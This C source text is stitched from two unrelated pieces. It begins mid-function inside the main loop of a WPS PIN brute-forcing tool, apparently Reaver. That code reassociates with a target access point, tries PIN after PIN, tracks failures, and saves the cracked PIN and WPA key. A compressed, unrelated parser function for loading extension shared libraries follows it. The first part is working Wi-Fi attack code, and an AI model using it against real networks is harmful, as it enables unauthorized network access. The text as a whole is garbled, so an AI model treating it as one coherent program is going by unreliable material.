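			cprintf(CRITICAL, "[-] Failed to generate the next payload\n");
			break;
		}
		else
		{
			cprintf(WARNING, "[+] Trying pin %s\n", pin);
		}

		/*
		 * Reassociate with the AP before each WPS exchange. This is necessary as some APs will
		 * severely limit our pin attempt rate if we do not.
		 */
		assoc_fail_count = 0;
		while(!reassociate())
		{
			if(assoc_fail_count == MAX_ASSOC_FAILURES)
			{
				assoc_fail_count = 0;
				cprintf(CRITICAL, "[!] WARNING: Failed to associate with %s (ESSID: %s)\n", bssid, get_ssid());
			}
			else
			{
				assoc_fail_count++;
			}
		}

		/*
		 * Enter receive loop. This will block until a receive timeout occurs or a
		 * WPS transaction has completed or failed.
		 */
		result = do_wps_exchange();

		switch(result)
		{
			/*
			 * If the last pin attempt was rejected, increment
			 * the pin counter, clear the fail counter and move
			 * on to the next pin.
			 */
			case KEY_REJECTED:
				fail_count = 0;
				pin_count++;
				advance_pin_count();
				break;
			/* Got it!! */
			case KEY_ACCEPTED:
				break;
			/* Unexpected timeout or EAP failure...try this pin again */
			default:
				cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), re-trying last pin\n", result);
				fail_count++;
				break;
		}

		/* If we've had an excessive number of message failures in a row, print a warning */
		if(fail_count == WARN_FAILURE_COUNT)
		{
			cprintf(WARNING, "[!] WARNING: %d failed connections in a row\n", fail_count);
			fail_count = 0;
			pcap_sleep(get_fail_delay());
		}

		/* Display status and save current session state every DISPLAY_PIN_COUNT loops */
		if(loop_count == DISPLAY_PIN_COUNT)
		{
			save_session();
			display_status(pin_count, start_time);
			loop_count = 0;
		}

		/*
		 * The WPA key and other settings are stored in the globule->wps structure. If we've
		 * recovered the WPS pin and parsed these settings, don't free this structure. It
		 * will be freed by wpscrack_free() at the end of main().
		 */
		if(get_key_status() != KEY_DONE)
		{
			wps_deinit(get_wps());
			set_wps(NULL);
		}
		/* If we have cracked the pin, save a copy */
		else
		{
			set_pin(pin);
		}
		free(pin);
		pin = NULL;

		/* If we've hit our max number of pin attempts, quit */
		if((get_max_pin_attempts() > 0) &&
		   (pin_count == get_max_pin_attempts()))
		{
			cprintf(VERBOSE, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
			break;
		}
	}

out:
	/* Common cleanup for every exit taken after the interface was opened */
	free(bssid);
	if(get_handle())
	{
		pcap_close(get_handle());
		set_handle(NULL);
	}
}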
int load_extension_library(PARSECONTEXT * ctx, YYLTYPE *loc, const char *sval ) { char *alt_name = 0; SHLIB *shlib = 0; FN_get_honey_jar_interface get_iface; size_t i; AST_XFUNC_DECL *xlib; if (access( sval, R_OK )) { alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval ); if (!alt_name) { char *spath; char *sval2 = FN_set_extension( sval, SHARED_LIBRARY_EXTENSION ); if (sval2) { alt_name = INC_PATH_resolve( ctx->lexctx.inc_path, sval2 ); } free(sval2); if (!alt_name) { spath = INC_PATH_to_text( ctx->lexctx.inc_path ); do_yyerror( loc, ctx, "Can't open file %s, tried to open the file in current directory %s%s Try to specify the search path with -I <directory name> or -i <directory name> command line options.", sval, spath != 0 ? "and then in each directory that is part of the search path: " : 0, spath != 0 ? spath : 0 ); goto err; } } sval = alt_name; } shlib = (SHLIB *) malloc( sizeof( SHLIB ) ); if (!shlib || SHLIB_load( shlib, sval )) { do_yyerror( loc, ctx, "can't load the extension library %s. %s", sval, shlib->last_error ? shlib->last_error : 0); goto err; } get_iface = (FN_get_honey_jar_interface) SHLIB_get_proc_addr( shlib, "get_honey_jar_interface" ); if (!get_iface) { do_yyerror( loc, ctx, "can't load the extension library %s. It does not have a function called get_honey_jar_interface. %s", sval, shlib->last_error ? shlib->last_error : 0); goto err; } xlib = get_iface(); if (!xlib) { do_yyerror( loc, ctx, "can't load the extension library %s. the get_honey_jar_interface did not return a value", sval ); goto err; } for(i=0; xlib[i].f_name != 0 ; i++ ) { PARSECONTEXT_add_function_def( ctx, &xlib[i] ); } ARRAY_push_back( &ctx->extension_libs, &shlib, sizeof(void *) ); return 0; err: if (shlib) { SHLIB_unload(shlib); free(shlib); } if (alt_name) free(alt_name); return 1; }